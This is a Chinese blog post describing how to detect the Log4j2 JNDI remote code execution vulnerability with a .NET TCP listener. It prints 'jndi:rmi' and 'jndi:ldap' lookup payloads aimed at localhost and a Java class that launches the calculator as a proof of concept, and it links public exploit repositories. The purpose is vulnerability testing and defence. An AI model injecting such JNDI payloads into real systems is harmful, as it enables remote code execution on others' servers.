.NET 程序测试 Java 项目 log4j2 是否存在远程代码执行漏洞

Posted 2021-12-12 _小渣渣

最近两天被朋友圈的“Apache Log4j2 远程代码执行漏洞”刷屏了，主要是因为组件存在 Java JNDI 注入漏洞：当程序将用户输入的数据记入日志时，攻击者通过构造特殊请求，来触发 Apache Log4j2 中的远程代码执行漏洞，从而利用此漏洞在目标服务器上执行任意代码。

影响范围

Apache Log4j 2.x <= 2.14.1

JNDI(Java Naming and Directory Interface)是Java提供的Java 命名和目录接口。通过调用JNDI的API应用程序可以定位资源和其他程序对象。JNDI是Java EE的重要部分，需要注意的是它并不只是包含了DataSource(JDBC 数据源)，JNDI可访问的现有的目录及服务有:JDBC、LDAP、RMI、DNS、NIS、CORBA，摘自百度百科。

网上很多文章说如何修复漏洞和漏洞截图，几乎没有说如何测试项目是否存在该漏洞。Java 使用 Log4j2 主要测试代码如下：

log.info("${jndi:rmi://127.0.0.1:8100/Main}");
log.info("${jndi:ldap://127.0.0.1:8100/Main}");

 

简单来说就是 Log4j2 会通过 rmi 或者 ldap 协议访问后面的地址，根据协议的内容解析，有可能执行已经恶意构造的代码。

网上几乎都是通过打开 Windows 系统的计算器来证明漏洞的存在，代码如下：

public class Test  {
        static {
                try {
            String[] cmds = System.getProperty("os.name").toLowerCase().contains("win")
                    ? new String[]{"cmd.exe","/c", "calc.exe"}
                    : new String[]{"open","/System/Applications/Calculator.app"};
            java.lang.Runtime.getRuntime().exec(cmds).waitFor();
        }catch (Exception e){
            e.printStackTrace();
        }
        }
}

既然 log4j2 会使用 rmi 或者 ldap 协议访问攻击者的服务器，rmi 和 ldap 协议都是基于 TCP 传输的，那么我们可以直接使用 .NET 监听一个 TCP 端口，如果调用 log4j2 打印日志会访问 .NET 的监听的端口，就证明可能存在漏洞，如果没有访问，就证明安全。

.NET 生成的测试程序非常小 6kb，代码如下：

using System;
using System.Net;
using System.Net.Sockets;
using System.Threading;

namespace ConsoleApp2
{
    internal class Program
    {
        static TcpListener listener = null;

        static void Main(string[] args)
        {
            listener = new TcpListener(new IPEndPoint(IPAddress.Any, 8100));
            listener.Start();
            new Thread(() =>
            {
                while (true)
                {
                    TcpClient client = listener.AcceptTcpClient();//接受一个Client  
                    Console.WriteLine($"Connection from {client.Client.RemoteEndPoint},可能存在漏洞!");
                    client.Close();
                }
            })
            { IsBackground = true }.Start();
            Console.WriteLine("开启监听!");
            Console.ReadLine();
            listener.Stop();
        }
    }
}

尝试使用 log4j 组件 2.14.0 版本执行打印，效果图如下：

 尝试将 log4j 组件升级成 2.15.0 版本，再次执行，效果图如下：

 

升级版本后，发现调用打印日志后，Java 程序没有再访问外部端口。

有兴趣的朋友，可以参考如下链接复现漏洞，调起计算器。

https://github.com/ilsubyeega/log4j2-exploits
https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce

最后，附上测试程序：https://files.cnblogs.com/files/itsvse/%E6%B5%8B%E8%AF%95%E7%A8%8B%E5%BA%8F.rar